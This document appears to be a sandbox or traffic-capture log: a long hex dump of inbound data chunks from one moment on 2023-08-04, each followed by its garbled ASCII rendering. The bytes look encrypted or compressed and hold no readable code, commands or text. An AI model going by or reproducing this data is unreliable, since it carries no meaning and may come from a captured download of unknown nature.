                                                                                      2023-08-04 16:48:40 UTC2822INData Raw: 3c 40 df 39 55 46 58 67 25 08 c6 2d 8a ab db 1d f6 cc 87 2e 46 73 9b 87 54 b5 67 1a 8d 06 d0 ab df 16 ec 46 03 e7 cb 4c 43 ef b3 82 76 94 41 0b 99 b3 c3 aa 86 4f 32 81 f2 a3 06 5d f5 b2 4b 5f f8 9a 1f e6 99 ca 64 d7 66 6b aa 0e ea b2 25 5c 1a ec 88 55 1b 69 b0 4b 22 36 07 f3 38 9e 6b 86 70 b7 df 4a f6 57 5c 42 30 07 37 b7 4b b1 25 de 46 b5 84 82 2b cd c1 9e a8 d0 8f 6e 64 2d 3f 82 fc 34 41 58 57 41 ab a1 df 77 bf 84 5c 31 2a 7a 82 6e f4 0a 52 95 94 dd dd 32 7d 49 c8 d6 ad bc 04 d8 fe 38 7c ad e2 8e 40 23 2f 5b 96 b1 9f 6e 96 17 49 02 15 36 cc a3 68 2d 3a fa d2 8b 8f 83 d3 14 4c 23 d5 87 36 2e 37 df 0e 09 aa 46 c2 57 f1 02 df d6 40 57 36 eb d0 9e b8 8f f0 10 fa ce fc b6 c6 4a 7f 6b f7 e7 f3 09 e0 5c 33 86 1c af 4e e7 6e 7c bf 91 e5 22 12 b0 cf bd ef b5 df
                                                                                      Data Ascii: <@9UFXg%-.FsTgFLCvAO2]K_dfk%\UiK"68kpJW\B07K%F+nd-?4AXWAw\1*znR2}I8|@#/[nI6h-:L#6.7FW@W6Jk\3Nn|"
                                                                                      2023-08-04 16:48:40 UTC2826INData Raw: dd b7 ed 78 fe 84 2e 13 04 cb 86 00 ec b3 e0 9f 34 57 71 35 54 05 22 ca 88 4b 7c d8 db 4b 88 f8 27 e1 41 82 92 4b 36 10 f5 08 ef 84 bc e6 40 bc 4c 58 ea 27 c5 21 fc e3 91 05 94 49 7e c8 e5 89 53 72 c3 78 ab d4 25 a4 a1 ff 03 9b 87 e0 f0 35 0b 95 a9 4a d6 23 f1 2d d2 2a b0 d9 c7 77 43 20 56 ea 32 83 54 ef 6b 29 1f cb 81 78 42 5e f2 eb 8a 35 64 95 5a e7 d2 06 89 f9 39 47 e4 1c 36 8b 08 52 de 05 23 7a 69 ab 41 cd c8 62 d8 06 61 a8 94 dc db bc 9e f7 b6 92 44 23 7f 7f d2 43 de b0 31 aa 03 92 e0 29 b2 bd 6e c3 1c 14 ff e9 e2 07 da 94 c0 cd b6 50 81 05 89 80 a2 c3 b3 81 be d0 ea 04 99 54 ae 3c 92 ea 06 b8 ef 41 f6 4b 0e 84 71 c3 84 38 38 d0 36 cf 56 d7 ee af e1 19 13 69 f8 ee f7 c0 98 cd 14 ee 0d 97 af c7 f9 ca 29 d7 34 e4 ef 42 33 f7 a6 e7 3b 1f b5 50 43 70 50
                                                                                      Data Ascii: x.4Wq5T"K|K'AK6@LX'!I~Srx%5J#-*wC V2Tk)xB^5dZ9G6R#ziAbaD#C1)nPT<AKq886Vi)4B3;PCpP
                                                                                      2023-08-04 16:48:40 UTC2830INData Raw: 83 b8 83 22 ef b6 83 69 4b 8b 88 d9 1d 2b e4 ab 04 6b 71 5f e1 6d f7 b7 b9 c0 1c 63 88 a5 c1 c4 7a bb 6e 4c bf 42 79 fa 1b 20 f5 d9 6c 3c b9 cf d4 09 fa 95 35 32 c4 23 1b a7 22 cf 9d b9 5f a3 f7 56 42 4d 72 dd 69 ca ce 69 a3 81 25 5f 72 a8 e4 98 80 a5 bf d3 07 6a d0 e4 98 2a f5 98 d5 1e 2b 44 ad cb 66 02 54 fc bf 1d cd a6 08 fe d2 b2 5d 85 16 83 73 ee 0c ac 10 87 ab 57 c8 c0 6a ec a5 f9 d3 3a d6 96 5a 64 83 5c 66 10 0f ab 91 02 cb b3 c7 95 ff f7 4f 8c ed 74 5e 1f 3d 8a a5 71 98 40 92 23 9a 62 0e 0b 07 d8 44 74 1d 97 4e a2 84 b3 4f c2 f3 b5 a2 86 62 8e 93 86 ee 4d 7c 42 46 d9 52 6b d8 dc 74 1e b0 57 d0 02 da 6d 92 f6 c4 2b cc c1 cc a3 46 a5 ce e2 6d 3c f2 73 70 05 c6 9f 71 6d 28 ed e1 af 9c bb 41 96 55 61 9b 12 3f 7e 3e e0 42 da 74 c2 71 ff b7 d6 d3 bd ef
                                                                                      Data Ascii: "iK+kq_mcznLBy l<52#"_VBMrii%_rj*+DfT]sWj:Zd\fOt^=q@#bDtNObM|BFRktWm+Fm<spqm(AUa?~>Btq
                                                                                      2023-08-04 16:48:40 UTC2834INData Raw: 61 a6 03 0b c1 79 87 a1 18 9e 6f 8a d8 46 ba 8f 58 c3 fd c3 06 e0 e1 64 53 be 89 95 ea a3 5b f7 41 e2 da 74 d9 94 b4 be ad 8b 18 7b 0b 9f 3a 73 31 41 db 19 70 9d 7d f4 d0 3e e4 13 ba 51 a1 79 55 e1 bd bb 15 bd 11 39 d9 61 33 a8 8d ef 33 7e 99 41 a5 09 15 34 64 38 60 26 1e 4a 16 6d 03 a5 32 a3 71 cf 30 87 4f f6 10 1e cd 51 1b ab ea 19 45 da b5 cc ce a9 f2 d8 2e aa 29 06 68 12 d5 86 40 ee 82 e5 28 2b d1 b9 17 5f 2e 9c c9 47 7d 45 0b a1 47 ac 81 f7 a7 a8 4e 68 a3 1e dc 7d 71 41 22 b3 0e 2c 51 1a 87 50 da eb 90 c7 84 75 6e 04 e5 80 d4 ac e1 70 28 c0 6e e4 f4 39 9b 0c ea 6b eb 44 82 b8 6e e8 da 45 31 04 18 26 23 dc 8c ed 12 6e ef 78 22 5f 2c 80 92 33 c4 96 38 6d 66 2f e3 9c b1 b2 fb 82 14 d7 02 0e e1 29 86 25 f7 28 d1 15 d5 cf 54 55 87 fa db b8 c2 19 83 b7 4e
                                                                                      Data Ascii: ayoFXdS[At{:s1Ap}>QyU9a33~A4d8`&Jm2q0OQE.)h@(+_.G}EGNh}qA",QPunp(n9kDnE1&#nx"_,38mf/)%(TUN
                                                                                      2023-08-04 16:48:40 UTC2838INData Raw: 50 ef 64 07 f4 9b 85 4c c7 b6 37 58 26 06 ee d3 ca ab 97 27 be f9 ea 48 85 9f 86 d2 ba 52 52 5e 59 89 ea f6 ed 05 33 ed 3c 0b 29 c8 2d 00 22 98 2d 36 1b 84 85 97 8f 8e 36 40 41 c0 eb 1b 2a a8 ce 0c 62 38 f1 b6 a1 f8 9b 0d 85 53 97 60 f9 1f 66 63 f9 6e 1f ef 2f 27 fe 12 58 60 8e ff f1 43 59 b3 34 8f d7 6a e1 cb c8 7a 74 cf 31 d4 c7 0a 8b ea 2e 03 01 f3 a3 be 04 20 22 24 77 bc f8 73 a8 03 4a d8 3e 2a 85 08 19 fa 96 94 87 22 48 06 4f 76 9f b1 70 a4 64 19 3c d5 49 6d d5 d6 76 1e 1c ef 0a 1c ab 45 68 a8 d6 3a df 21 8b 73 32 05 aa c6 0a d5 cb 6d 84 73 a4 4d 34 eb 5a dc 88 06 ef 64 46 89 04 a5 c9 d8 fd 0b 06 6d 95 f7 db 0f 3a bf ca a8 5e ed 1f 71 13 2f 45 6f 5a 88 5a ab c2 dc e6 44 03 47 51 a3 f9 e4 25 95 7b e0 87 84 ca 89 a5 0f 66 86 5e b2 09 d4 9d 71 e1 67 e6
                                                                                      Data Ascii: PdL7X&'HRR^Y3<)-"-66@A*b8S`fcn/'X`CY4jzt1. "$wsJ>*"HOvpd<ImvEh:!s2msM4ZdFm:^q/EoZZDGQ%{f^qg
                                                                                      2023-08-04 16:48:40 UTC2842INData Raw: 29 ad f4 34 f9 a6 d2 60 9d e5 ad e0 54 b9 f1 c2 60 08 a3 24 95 65 a5 95 10 ea 36 f3 d8 66 21 82 46 42 26 75 b5 08 41 6f 8d 11 ab 09 38 fa da 05 7b 54 39 7f b1 16 a1 98 86 f9 88 7f cc dd d0 0c 85 28 4d c6 69 1a f1 54 62 a1 23 2a 48 d5 83 b9 6b a1 a8 35 a9 98 b5 a9 64 6d 5f e6 ec de 9d 1a 53 92 c7 53 d2 79 79 71 70 70 3d fd b0 4b 7c ba 03 c0 32 33 66 0c 35 e4 d6 42 53 8c 3c da 9d 12 a4 ef 98 ab e3 bc 65 91 7c 48 0a 53 4d 6b 2c 80 b8 e9 d3 10 2d b5 3d 03 55 c4 da fa 51 80 01 72 1b 5b 0b 3d 58 7f 19 32 10 44 e3 70 1f 6d 3d dc 1f 66 da 25 e2 7b ce c9 ee eb 69 f4 0c aa 19 39 f2 5b 97 e4 48 a2 62 00 0a ff fa ce 8d 5a 9b dc a4 2b 00 95 5e f4 61 52 37 91 64 77 e0 70 0e 1f eb e9 7a 0a d8 3a 3c 11 e7 1a 8b 01 f4 df 5f a0 12 6b 0a d2 30 53 36 30 99 81 3d 1d a4 51 44
                                                                                      Data Ascii: )4`T`$e6f!FB&uAo8{T9(MiTb#*Hk5dm_SSyyqpp=K|23f5BS<e|HSMk,-=UQr[=X2Dpm=f%{i9[HbZ+^aR7dwpz:<_k0S60=QD
                                                                                      2023-08-04 16:48:40 UTC2846INData Raw: 64 94 73 92 13 e8 44 17 63 94 c4 23 d3 f3 a5 2a a4 06 48 bb 32 69 d5 6c 27 06 cb d5 8b fe 2e b9 b2 45 cf 70 8b 00 df e1 c0 e6 e6 67 2a 35 2a f2 01 d6 f7 38 a7 b0 ad dd 51 ee c0 19 58 af 3e da ea df 36 63 d1 6b 0e c8 4d 37 c7 a2 77 e5 81 a5 8a 0c 62 9d 22 c3 b5 e6 45 5d 45 9a 3b 57 e1 04 f5 cf 86 13 2d 46 84 49 ea 83 c8 c1 c3 09 ea 03 f2 8f c7 42 74 09 db e2 32 5c 31 26 e4 68 1c 57 f7 73 5c 07 52 e5 0e 4f 31 06 77 90 37 b7 e3 93 4e 17 e1 4a 02 41 3b 9e 35 00 01 d2 7c 5a 69 1f 93 95 25 48 27 97 cf 50 50 b7 ed f2 18 3c 9f 50 ec 03 6a 51 96 38 e7 78 68 4c f0 b1 a2 2f 1e 85 71 2b 75 7a 43 bf 80 51 b6 88 da 23 4e d4 7b 02 f0 47 9f 80 ae 9d 21 3e 51 27 d8 62 79 80 a0 1c 5b 47 ca d5 8f 4c 86 56 0d 15 8d e1 e4 7a ec 11 56 67 fa 2a 27 27 37 72 6c 0c 29 95 99 68 b8
                                                                                      Data Ascii: dsDc#*H2il'.Epg*5*8QX>6ckM7wb"E]E;W-FIBt2\1&hWs\RO1w7NJA;5|Zi%H'PP<PjQ8xhL/q+uzCQ#N{G!>Q'by[GLVzVg*''7rl)h
                                                                                      2023-08-04 16:48:40 UTC2850INData Raw: 76 ba 6d dd f7 ad da 3e 31 84 f8 8a a2 8a 80 eb b9 e0 93 23 c8 c7 f3 f1 30 e7 1f 2f 81 53 ed cb 79 08 8f 95 64 9d 7c 72 83 89 c8 c0 18 8c 3e 00 3d b5 de ab ae 8e ab e4 d7 73 de c5 69 67 57 7a 8d e3 62 75 f2 a7 bd 10 fa 5a 7e ae 72 b7 26 88 5c 7e f9 63 af a5 4e 49 cf 43 05 28 31 29 a8 4f c5 76 b9 3a ea a1 3a 1c f7 2d 99 7d df 53 aa 80 30 60 3a c8 45 fe 3c 63 fc 84 bd 7c d6 d6 94 6a b9 87 dd 84 8b 36 71 62 9e 74 fa 32 a5 1e f4 ef 56 30 f6 dd 05 50 ac ae ca 94 f2 e0 95 2a 5c 8f 66 a3 0c ac 5f 90 2e b6 1e 88 87 80 a9 37 6f ee 36 24 8b 18 d9 ec 35 36 b0 ee 08 ae b3 99 f9 8f 3e 92 0a 5c 3c 6c 8e 98 04 5f 22 13 a5 2c 18 4c d2 fb d9 e2 7b fe 0a 83 73 06 8a 53 fa cc 17 6a 8a 17 10 62 c4 c0 2c b5 d1 04 16 6a b6 0c 07 9a 4d 57 b3 e3 bd cb aa 6f 65 27 7b 7e e5 d8 29
                                                                                      Data Ascii: vm>1#0/Syd|r>=sigWzbuZ~r&\~cNIC(1)Ov::-}S0`:E<c|j6qbt2V0P*\f_.7o6$56>\<l_",L{sSjb,jMWoe'{~)
                                                                                      2023-08-04 16:48:40 UTC2854INData Raw: 9c fd 8c e2 cc 0b cc e5 58 b1 09 36 27 0d 3e 29 10 f3 6f c9 65 2e f7 d6 05 f7 fa d3 f4 72 31 57 91 2e fd 34 35 6a 24 fb 68 83 0c 87 64 fa 2b 20 e0 c7 8b f8 15 d6 5b 1b fa f8 9b 96 d9 4c e1 07 fa 3c e8 92 a2 99 33 29 14 c1 bc 34 cb 33 90 4c 37 de 72 49 12 04 00 5c ec d4 dc 37 7d b8 d6 3b 2a 8e b1 54 62 de bc 49 1b 26 27 6b 5b 28 ce 0b cc 43 11 05 e2 a4 9b 43 12 0a fa 12 52 28 eb a5 ad 27 eb 2c 88 fd f8 b0 09 43 a2 35 63 fb b2 57 cd 1e e8 70 f5 4f 20 ed df 68 89 84 be f4 e4 f2 74 36 9c 42 94 8f 73 cb a7 e2 fe 24 dd a8 fb 80 ea 80 11 32 c9 b9 d1 e0 08 b4 1b 40 0c 7e 18 81 f9 b7 ec cc 3e ae b7 9b f2 a7 e2 43 46 30 26 02 f7 a9 36 84 59 87 02 19 55 0a 4e 82 00 30 de fa 2f a1 5b 94 d6 33 4a c3 3a b9 15 dd 06 3e 25 86 78 fb 62 a5 4b b7 21 a1 0b 11 e4 35 da 76 ce
                                                                                      Data Ascii: X6'>)oe.r1W.45j$hd+ [L<3)43L7rI\7};*TbI&'k[(CCR(',C5cWpO ht6Bs$2@~>CF0&6YUN0/[3J:>%xbK!5v
                                                                                      2023-08-04 16:48:40 UTC2858INData Raw: e3 86 df 83 a3 d7 5a a3 d0 18 47 f7 81 91 32 fb a4 e8 3b e0 da 0e 8f 97 f0 45 ed 6b d1 d2 f8 97 11 87 e5 ae 87 74 53 94 08 ce 45 40 8c cd af c8 63 cd 25 29 93 f8 e0 f6 1b 1a 3e e7 b6 39 dc 60 06 aa 1a 08 4d 51 c7 6b 21 1d cf 71 54 ae b8 72 41 89 f8 fa 87 9d 33 6d 77 21 98 ea 8b fb 06 34 05 db 5f ca 40 51 a2 21 94 85 5d 04 fb aa 7e 5b 87 d9 07 1d 86 95 39 e2 f6 66 5c f1 ad 8f 11 16 da c8 87 40 67 91 bc d5 f2 19 31 f2 f4 b0 af a5 0e 66 3f c7 38 e8 07 49 ef da 3e 4b f5 c6 f3 b6 da a2 22 9b 1a 6f 47 35 81 0f eb a5 11 5b bb 4a 80 23 c5 43 54 57 8a 47 45 82 bf 6d e4 44 a0 d2 02 83 df 96 88 a8 b4 aa e0 68 b0 f4 09 e7 ee c1 e4 be 6b 58 4c 79 8f 4b 4f 91 1c 2d 7e 44 5b 58 80 dc 84 cc 7f 4b 4a bc 41 29 51 f3 8b 78 20 f6 67 b0 12 89 dd e2 c3 02 3a 17 07 a8 5d d3 6d
                                                                                      Data Ascii: ZG2;EktSE@c%)>9`MQk!qTrA3mw!4_@Q!]~[9f\@g1f?8I>K"oG5[J#CTWGEmDhkXLyKO-~D[XKJA)Qx g:]m
                                                                                      2023-08-04 16:48:40 UTC2862INData Raw: 5b 09 cb e9 58 37 a5 df f1 e7 d6 78 fb 3c 3a 9f a2 ad 32 79 f2 5c 2e 6e 82 16 b2 d7 c7 c1 92 1c 9c 2a 8d f4 60 e3 a5 04 81 ac 00 73 3d 83 72 42 dd f1 5b 5e d8 18 71 c9 4b 76 66 33 b3 65 83 c1 3f b5 e7 96 00 48 d0 a5 61 82 e2 d8 65 d9 cf 98 67 2d a3 f6 8a 80 df 5e 41 42 35 c2 14 87 6c 1c 55 59 eb fa 79 e2 14 86 72 87 30 0a 8c de 45 18 09 f0 14 52 16 c7 91 fd a7 67 30 8b af 42 59 74 81 2b 9b 5f b6 a5 ae 35 d0 fe da 6f 25 06 9e 5c 97 9b 80 43 1f b8 af 63 bd 33 a4 ab f9 5b 99 83 2d da 77 f0 c2 44 42 d6 78 7c 93 ea 5d d4 5d d8 26 76 a7 f1 ed 17 9f 01 75 95 58 8e e8 de 6b 45 42 6d f4 39 24 00 f1 30 b8 28 e6 8b a4 e3 0f ab 91 ad 7f 94 27 bb fb b3 64 e9 93 c2 07 e6 19 65 64 8d 6f fc 5b 00 fa d7 be 8a 2c 07 72 d3 65 63 b4 43 b0 26 3b ea 00 59 af 09 95 02 f8 3a 49
                                                                                      Data Ascii: [X7x<:2y\.n*`s=rB[^qKvf3e?Haeg-^AB5lUYyr0ERg0BYt+_5o%\Cc3[-wDBx|]]&vuXkEBm9$0('dedo[,recC&;Y:I
                                                                                      2023-08-04 16:48:40 UTC2866INData Raw: c7 9f a3 3e fc 92 2a b0 fb cd b5 66 36 81 a1 d3 38 1e 0d df 09 6c ea 86 35 a0 2f 1c 29 33 4c df 6f 56 6e 02 8d b2 98 0b 34 0b 77 00 33 73 bf 93 1c 13 0a 0f cf 2a 54 b6 2e 52 d6 a2 6f fc 1c 1b b3 72 4c c6 1b 68 cd 9a bb 08 23 5f 78 b6 6a 39 9e b8 91 70 ce fb 6a b5 b1 42 63 88 3e 34 9b 81 6d fe 09 fc 06 7a f4 ff 42 74 ae 6d 40 bd 28 bb b3 66 a7 77 f4 3b 89 f5 9c e0 c8 d6 a3 52 de a6 5a d5 49 e8 c4 15 84 1b f1 eb 65 34 42 38 90 9f dc 19 9c 36 08 46 88 ca 2f 12 e8 7f 2e 96 1f 91 20 b0 e2 d2 4b 44 42 b2 91 bd 54 ba d2 ea e9 b0 94 18 69 69 cc 20 b2 33 ff 5c d1 b8 c3 29 7c e4 5b 61 91 98 d1 d6 a9 15 2b 03 db dc 11 0c 81 b4 ec 0e cc 58 52 c1 a8 ea 50 45 43 99 36 ea 0c d5 4c d3 cd 1a d0 2d 8a 7e 8e 51 21 55 f9 d7 98 e4 8f 31 6d 94 52 14 a4 4d 95 13 a6 ce 6a ba d6
                                                                                      Data Ascii: >*f68l5/)3LoVn4w3s*T.RorLh#_xj9pjBc>4mzBtm@(fw;RZIe4B86F/. KDBTii 3\)|[a+XRPEC6L-~Q!U1mRMj
                                                                                      2023-08-04 16:48:40 UTC2870INData Raw: b4 2d b1 e5 17 83 50 57 15 00 6d c6 4f 7d 60 81 65 84 b7 87 e1 02 ad a0 1c c9 5f cd 02 99 f7 eb ec 3f 8d 5d 7b 3d 2c 4b 5c 4d cd 29 40 4a 6f 75 ec 04 6a c6 87 64 57 6e b7 69 a7 55 e8 f2 82 3e 17 a9 59 c2 c7 b1 46 f8 e4 58 84 99 65 63 6f 7a ca af 42 cd 09 70 c2 97 61 fd 4e c1 b7 b3 0a 36 38 22 b2 aa 19 1b 95 2d f5 26 f5 11 0d 49 0d 8f fc 5a 1a e3 16 e3 53 fc b9 ed fa fd 9a 0c 55 c7 30 fd 9a dd 45 e4 38 56 6d 56 41 81 77 7f 64 a7 23 94 a9 12 54 39 9f 17 47 3b 92 b9 50 57 93 f3 e7 c8 fe d0 99 3c 6e de a7 e2 57 d7 d0 e3 e5 e2 e5 c3 a1 06 a7 bf 09 d1 7a a1 3c c8 03 6c 2e 28 d2 fb 26 e4 35 3d 5a f7 17 86 b8 ac b0 74 07 e1 c2 b4 ce 3f 43 9c c2 be 04 60 19 9d 15 d4 c0 f9 ee b3 cd e4 12 39 2a 7b 36 18 f7 53 90 6d a5 cb d1 21 14 48 57 03 90 0b ae 85 83 53 38 ab f4
                                                                                      Data Ascii: -PWmO}`e_?]{=,K\M)@JoujdWniU>YFXecozBpaN68"-&IZSU0E8VmVAwd#T9G;PW<nWz<l.(&5=Zt?C`9*{6Sm!HWS8
                                                                                      2023-08-04 16:48:40 UTC2874INData Raw: 3d 8f dc ba 8c 9e 57 56 ed 40 ac 41 42 57 90 87 21 e3 30 5d 2d 4e 5d c3 1f 93 9f 58 16 89 ef 65 f8 c5 19 92 83 61 b4 83 ff ac ad f6 0c f1 aa 73 b6 7d 01 ca bc c6 3e 6d de 42 f6 d9 99 66 a2 b0 66 e9 1e 64 a3 84 8f 57 05 2a 19 ed b9 bd a9 68 68 e1 69 1b d1 95 54 dd ec 5a c6 a0 6d be 4a bf 6e c2 0c 73 62 e8 8f 46 3e ed db 8d 5f f1 9f 60 f8 e3 23 35 61 6e 7a 46 0b 15 31 dc b8 50 13 cf 25 68 cf 85 86 c0 9a aa ea 75 f9 b9 f0 66 90 7e 14 8c 29 5d 4d fd b3 0d 64 98 af 5e 82 50 c2 f2 e2 9c de 4e 8f 32 64 68 78 7e c9 5e 56 58 4e d1 82 75 8c a8 3c bd 76 fc 03 5a 89 8b c2 15 ad f0 2e 7c ff 5b 2d 47 6d 4d 3d 3e b2 29 61 32 80 37 5a 5f 56 2f 9b 2d 5c 5a 44 7e 0e 75 f3 8d 94 77 88 58 c6 4a c6 f0 f5 96 32 ea bd ff 8d 42 63 20 56 a4 c9 43 f5 f6 84 83 f2 29 1f 35 9b 38 75
                                                                                      Data Ascii: =WV@ABW!0]-N]Xeas}>mBffdW*hhiTZmJnsbF>_`#5anzF1P%huf~)]Md^PN2dhx~^VXNu<vZ.|[-GmM=>)a27Z_V/-\ZD~uwXJ2Bc VC)58u
                                                                                      2023-08-04 16:48:40 UTC2878INData Raw: e9 2c ad 04 93 3a 32 f5 d8 4d 8b c2 8e 69 05 7a d1 36 25 d9 3f 9d cf c1 54 8a 70 1c 4c 49 86 9b 55 a0 5d 9e fd 1f 0f 22 9c e5 df b4 f9 3a e8 1a e1 30 31 36 98 55 f5 a0 c5 bc 17 ee a7 00 c7 13 31 90 db 8e 6f 9e f4 bc 35 4e c3 ea b7 c4 8d a8 14 b9 2c 75 ef e4 b0 8d 29 e8 44 97 c2 06 a4 b0 e4 d7 d1 b9 65 0f d7 00 58 08 96 f8 0b ff a4 2c c0 88 fa 13 b2 56 18 3e 03 cf 83 66 d3 7e 69 10 d5 7a 33 f9 23 f1 2f 68 2f d0 27 66 7b 07 6f ea eb 92 fe 54 a9 59 1b 0c 5c fa c5 f1 31 b3 cc 25 6d 25 1e a5 71 e6 bf 7a e8 86 e8 10 01 1c 86 33 c7 cd 60 ab 09 bd fc 02 78 7f 97 77 a8 3b 07 9e 01 f7 e5 71 59 40 3e 54 16 82 ab 7b 16 0d bf e1 1e f3 3f 70 a2 0b 1a 03 19 84 2b 00 f6 17 ef c2 de 21 bc 50 64 68 62 d3 85 34 9e da d2 0e a4 ac 0f fd 60 e9 40 8c a8 11 f8 a7 15 d6 1c 82 4b
                                                                                      Data Ascii: ,:2Miz6%?TpLIU]":016U1o5N,u)DeX,V>f~iz3#/h/'f{oTY\1%m%qz3`xw;qY@>T{?p+!Pdhb4`@K
                                                                                      2023-08-04 16:48:40 UTC2882INData Raw: df b1 be aa 93 29 27 25 85 85 64 14 06 07 9d 6f dd 40 d7 5b c3 74 83 1b e4 8f 44 98 6d a6 70 28 53 fe b2 6b b9 9e f4 eb 33 81 74 72 b9 09 6e af 22 f0 a8 a1 2d b9 52 00 15 e2 ae 19 78 8f 86 89 65 83 34 13 c4 b3 9b e0 c0 d2 3f e7 3d 9d 2e 6b 05 c0 ce 35 7f a5 bb 78 9f 94 2b 4c a7 d9 6a 13 49 d2 ef 6e 5e 88 27 ad b5 95 ea ac ad 3a c2 20 e2 a3 07 a8 16 7d 43 25 a7 df bd 6a 0b b4 4e e0 e2 78 57 d7 b2 f5 51 16 35 09 8d 7b 59 78 b3 38 88 42 88 4f 6c e7 7c 3e 3e 56 c7 27 3e 34 5c 7d 92 4d 05 7c 4b 95 19 24 a6 c2 11 c7 32 b5 54 22 f9 dc 2e ac 69 7f b6 f2 13 71 74 ff 6a f7 77 f0 16 1f 8a 98 b9 c2 01 0c 8b 3e 44 c6 a4 9b ed de 24 47 0a 71 b0 2e de 4a e6 d6 10 f1 5b c3 5a 19 57 02 aa 81 43 77 06 6d 77 83 1b 86 21 b0 af e7 24 37 8d c8 e5 9f 30 2a cf 98 4c 38 88 00 4e
                                                                                      Data Ascii: )'%do@[tDmp(Sk3trn"-Rxe4?=.k5x+LjIn^': }C%jNxWQ5{Yx8BOl|>>V'>4\}M|K$2T".iqtjw>D$Gq.J[ZWCwmw!$70*L8N
                                                                                      2023-08-04 16:48:40 UTC2886INData Raw: e5 d1 22 39 5b c3 4d 51 b9 ba 1d 1c 2f 17 ae f6 41 6f e5 69 fa 43 f6 d1 cf 9c c1 8f 59 db be 23 d0 5f 8a 9d 76 12 b5 32 5a 49 6b e3 37 80 eb e6 6e e5 32 10 91 b0 0f 0d 15 e6 0f ec da ae c1 58 52 b3 03 b9 c2 61 e6 6a b9 7d cb c5 77 44 54 87 34 79 9d 5d 37 4a 69 1b a9 a3 73 7e 63 6b cf 5f 41 ef 9a f5 46 87 29 fc a5 1a be e6 46 c8 62 6c 3e b5 9a 3e fe 32 83 58 c1 a5 c7 45 1c 69 81 06 77 f8 cc 01 8c 48 ec 86 5e 5e 0d a0 dd 52 c8 a2 fc 06 ce e8 f3 d1 0c c1 0c 71 59 50 16 7b 50 a1 83 e1 a4 37 4d 32 90 69 ff bf a1 17 83 c9 c1 03 c5 25 31 b5 06 e0 9b 4a a3 6a 3c 48 cc b8 a3 39 08 da 4d 5f 88 95 28 09 b3 ed eb a3 07 a9 31 2f 25 03 90 d5 0f 81 6a 13 ac 31 f1 41 d1 23 93 c1 a2 2c a1 a7 39 40 a1 89 c5 9d b2 d8 24 da ab 94 3f 48 5b 99 5d 21 15 0e b8 88 4b 96 1e d5 bf
                                                                                      Data Ascii: "9[MQ/AoiCY#_v2ZIk7n2XRaj}wDT4y]7Jis~ck_AF)Fbl>>2XEiwH^^RqYP{P7M2i%1Jj<H9M_(1/%j1A#,9@$?H[]!K
                                                                                      2023-08-04 16:48:40 UTC2890INData Raw: 31 2e 58 91 54 7b 2d c4 43 b8 f2 ab f1 fb c0 70 d4 36 38 da 20 34 6d 47 fa ba 94 8e 0c 64 23 3d f2 9e 11 01 09 b4 31 92 eb f0 3c 42 b4 33 4f f5 2b f4 e2 e8 41 03 c9 5d ae d8 ea 82 3e 99 26 c0 9b c3 a1 c3 e3 bd bf 4f 63 4b 35 53 ff 1f 1d a2 8d 05 4d 77 3d ec 23 69 fa 18 99 8e b9 88 7e 96 f2 c7 c4 ae 88 90 74 ad f2 8b e1 07 a7 4d e2 9b cf b0 13 19 af 02 f0 0c e6 c0 22 35 c1 be c8 ad 4c c6 5c 77 22 fe 94 90 a2 29 8d 84 d7 ce ac ca 84 9a f4 57 71 0f 25 78 49 70 25 91 ca 9c c4 79 89 73 98 2f d0 90 46 01 a6 98 75 c5 96 98 a7 62 c4 dd f9 45 74 28 45 e4 f4 18 75 12 52 b0 f5 de b9 55 d7 59 99 86 e4 48 1d b9 22 ae 3d f3 a7 36 03 de 4f 40 43 b3 d2 57 48 9b 39 41 06 0b f0 a0 88 97 8d 4f 3c 49 08 40 35 cb 5e f5 b8 d4 b9 c4 b2 e9 b5 fd d1 50 da ed 9a 80 47 a6 1e 8d c5
                                                                                      Data Ascii: 1.XT{-Cp68 4mGd#=1<B3O+A]>&OcK5SMw=#i~tM"5L\w")Wq%xIp%ys/FubEt(EuRUYH"=6O@CWH9AO<I@5^PG
                                                                                      2023-08-04 16:48:40 UTC2894INData Raw: 1c bc 6a 69 e3 df a5 93 ff b1 09 e3 1e 60 ed 47 f6 87 06 b6 3d a9 05 3d 00 3e cf c8 76 44 1a d8 ca 48 b3 22 58 5b 6d 04 c8 bb 82 59 cb 26 a6 b4 9d 7b 9a 44 3a 61 ca 99 b4 2d c2 dc 59 59 1a 7a 22 f1 2c 59 cd 36 51 d1 be 9d 60 15 36 35 b8 4b 52 dd ce 55 8f f0 a3 d1 5e 95 8f 5e 32 2e d8 ac 5a f5 43 0e b2 11 88 ef a6 aa 35 1a 53 4c 3e 1a 80 6e 19 c1 b3 82 7f 0d e7 6a 8d bb ca 5e 81 9d 99 bb bc b4 e1 81 60 5b a9 83 18 c5 a6 6d 04 e8 52 38 00 2a b2 f2 de d3 ca 1e 17 10 b8 40 e5 41 ae 24 c9 3e b2 c1 f4 2e f6 2e f2 1f fb 45 aa f5 c9 03 18 d3 01 b9 0d 2f 08 37 64 6d 8c 29 9d 57 c1 8f 89 bc c4 9a d4 47 4b 11 29 f8 6d 04 f9 55 d2 2e 52 e5 2d 71 7e 32 97 0e 50 17 08 1d 6c 07 18 fa d8 f4 44 f0 b6 f1 37 96 2f 5d ac ab 5f 9f 23 00 57 5f 2e cc a0 6b 48 24 f0 cd 88 48 55
                                                                                      Data Ascii: ji`G==>vDH"X[mY&{D:a-YYz",Y6Q`65KRU^^2.ZC5SL>nj^`[mR8*@A$>..E/7dm)WGK)mU.R-q~2PlD7/]_#W_.kH$HU
                                                                                      2023-08-04 16:48:40 UTC2898INData Raw: 47 bf fe df 31 3f 51 1a b4 7c 4f 8e 21 f0 75 b1 58 ea 0c 55 e1 df 0c a4 c6 b2 a6 25 98 d7 55 97 9a 80 e4 20 33 40 2d 0c dc d0 09 1d 26 78 05 7d e8 ed 31 9c fd 9c 45 c6 3f 23 9a d4 ec 41 12 a6 6b e2 c6 47 b7 0a 54 3a d6 98 76 1b 01 82 c4 c1 28 b6 cb 0c 85 6b 22 4a e2 64 33 40 80 ba 34 f8 53 a0 a3 38 ac e1 6b 98 7a 4c 56 24 ee c2 ac 25 9a 8f 5a 6a 75 5e 4d fb 99 86 c6 59 2c df 1e 41 51 42 7a 8f b9 a6 e6 ad 2e 86 8a 3d 5d e6 d3 51 c9 d4 aa f7 47 4a 02 ee 9d 4f 66 41 f7 1c 7b b0 bf c4 bc 91 fa d3 51 21 bd 8d 63 0c cf aa bd 73 fc 74 dc 76 98 b9 b2 88 fc b5 b4 83 84 7f b3 c1 bc 19 ab c3 86 2d fc dd 91 32 2d f2 ad b7 79 0a 8d 6a f0 3f e3 2c bc 81 23 30 14 05 67 97 bc 71 33 cc 42 f2 